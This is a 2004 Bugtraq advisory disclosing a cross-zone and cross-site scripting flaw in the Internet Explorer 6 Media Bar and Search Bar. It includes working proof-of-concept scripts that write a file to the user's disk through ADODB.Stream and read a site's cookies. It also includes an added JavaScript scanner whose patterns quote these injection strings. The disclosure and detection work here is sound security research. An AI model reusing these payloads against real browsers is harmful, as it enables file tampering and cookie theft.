Date: 3 Mar 2004 12:47:06 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: New Internet Explorer Cross Zone/Site Scripting Vulnerability





#########################################################################

Advisory Name : Internet Explorer Cross Zone/Site Scripting Vulnerability
 Release Date : Mar 3,2004 
  Application : Microsoft Internet Explorer
    Tested On : MS-IE 6.0(sp1)
   Vendor URL : http://www.microsoft.com/ie
       Author : Cheng Peng Su(apple_soup_at_msn.com)

#########################################################################


[Proof of Concept]
   The code below loads a URL into the HTML content area of the Media Bar:
   window.open("http://www.google.com/","_media")
   JavaScript can be injected the same way:
   window.open("javascript:alert(location.href)","_media")
   On my computer, the code above shows a message box saying
        'res://C:\WINDOWS\SYSTEM\BROWSELC.DLL/mbLoading.htm'
   which indicates that it is executed in the My Computer zone.
   Code can also be injected into a Media Bar that is already connected to a website.
   The Search Bar has the same vulnerability as the Media Bar.
   
[Exploit]
   !YOU CAN FIND THE DOCUMENT AT
   !http://www.freewebs.com/applesoup/CrossBar/document.txt
  
   The code uses the 'file:javascript:[script]' vulnerability that was posted months ago. Maybe Microsoft
   has noticed the leak here, so I can't use only the javascript: protocol in the code, and the script tag
   is filtered out, so I have to inject the script through an img tag.
   
   I. In Media Bar
   1 . Cross Zone Scripting Exploit
   ---------------------------CrossZone.htm---------------------------
   <script>
   
   // '\\42' -> '\42' -> ' " '
   img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
   + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
   + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';

   inject_html="<img src='" + img_src + "'>";
   
   window.open('file:javascript:document.write("' + inject_html + '")','_media');

   </script>
   -------------------------------End---------------------------------
   
   
   2 . Cross Site Scripting Exploit
   ---------------------------CrossSite.htm---------------------------
   <script>

   window.open("http://www.google.com/","_media")
   setTimeout(function(){
   window.open("file:javascript:alert(document.cookie);","_media")
   },5000);
   
   </script>
   -------------------------------End---------------------------------
   
   
   
   
   II. In Search Bar
   1 . Cross Zone Scripting Exploit
   ---------------------------CrossZone.htm---------------------------
   <script>
   window.open("http://wrong_site_add/","_search") // load the "Friendly HTTP error messages" page,
                                                    // which is in the My Computer zone
   setTimeout(function(){
   
      // '\\42' -> '\42' -> ' " '
      img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
      + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
      + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';

      inject_html="<img src='" + img_src + "'>";
   
      window.open('file:javascript:document.write("' + inject_html + '")','_search');

   },5000);
   
   </script>
   -------------------------------End---------------------------------
      
   
   2 . Cross Site Scripting Exploit
   ---------------------------CrossSite.htm---------------------------
   <script>

   window.open("http://www.google.com/","_search")
   setTimeout(function(){
   window.open("file:javascript:alert(document.cookie);","_search")
   },5000);
   
   </script>
   -------------------------------End---------------------------------
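   Detection logic for the pattern used in the sections above, added here as an example (it is not part of the advisory or of any Microsoft code): it scans script text for window.open() calls that push a javascript: or file:javascript: URL into the "_media" or "_search" targets, first decoding the octal escapes (\42) the exploit uses to hide quote characters. The sample input is constructed; the scanner assumes each window.open() call sits on one line.

```javascript
// Added example, not part of the advisory: flags window.open() calls that load
// a script-scheme URL into IE's Media Bar / Search Bar targets ("_media",
// "_search"), including the file:javascript: form and octal-escaped quotes.
// Assumption: each window.open(...) call sits on a single line.

const SIDEBAR_TARGET_RE = /['"](_media|_search)['"]\s*$/i;
// Decode one layer of JavaScript octal (\42) and hex (\x22) escapes so that
// obfuscated string literals are matched by their runtime value.
function decodeEscapes(s) {
  return s
    .replace(/\\([0-7]{1,3})/g, (_, o) => String.fromCharCode(parseInt(o, 8)))
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}
// True when the URL would execute script in the sidebar: a javascript: URL,
// optionally wrapped in the file: scheme. Case and embedded whitespace are
// normalised because the URL handler tolerated both.
function isScriptUrl(url) {
  const u = url.trim().toLowerCase().replace(/\s+/g, "");
  return /^(file:)?javascript:/.test(u);
}
// Scan source text for window.open(<string literal>..., "_media"|"_search")
// and return one finding per call whose first literal is a script URL.
function findSidebarScriptOpens(source) {
  const text = decodeEscapes(source);
  // group 1: quote char, group 2: first string literal, group 3: remaining args
  const callRe = /window\.open\s*\(\s*(['"])((?:\\.|(?!\1).)*?)\1([^\n]*)\)/gi;
  const findings = [];
  let m;
  while ((m = callRe.exec(text)) !== null) {
    const url = m[2];
    const target = m[3].match(SIDEBAR_TARGET_RE);
    if (target && isScriptUrl(url)) {
      const line = text.slice(0, m.index).split("\n").length;
      findings.push({ line, target: target[1].toLowerCase(), url });
    }
  }
  return findings;
}
// Constructed sample: a benign sidebar load, the advisory's two injection
// forms, a concatenated file:javascript: URL and an octal-obfuscated one.
const SAMPLE = [
  'window.open("http://www.example.com/","_media")',
  'window.open("javascript:alert(location.href)","_media")',
  'window.open("file:javascript:alert(document.cookie);","_search")',
  "window.open('file:javascript:document.write(\"' + inject_html + '\")','_media');",
  'window.open("\\146ile:javascript:alert(1)","_media")',
  'window.open("http://www.example.com/","_blank")',
].join("\n");
console.log(findSidebarScriptOpens(SAMPLE)); // four findings: lines 2, 3, 4, 5
```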

[Demo]
   Harmless demo:
   http://www.freewebs.com/applesoup/CrossBar/CrossSiteMB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossZoneMB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm
   
[Contact]
Cheng Peng Su
Class 1,Senior 2,high school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com
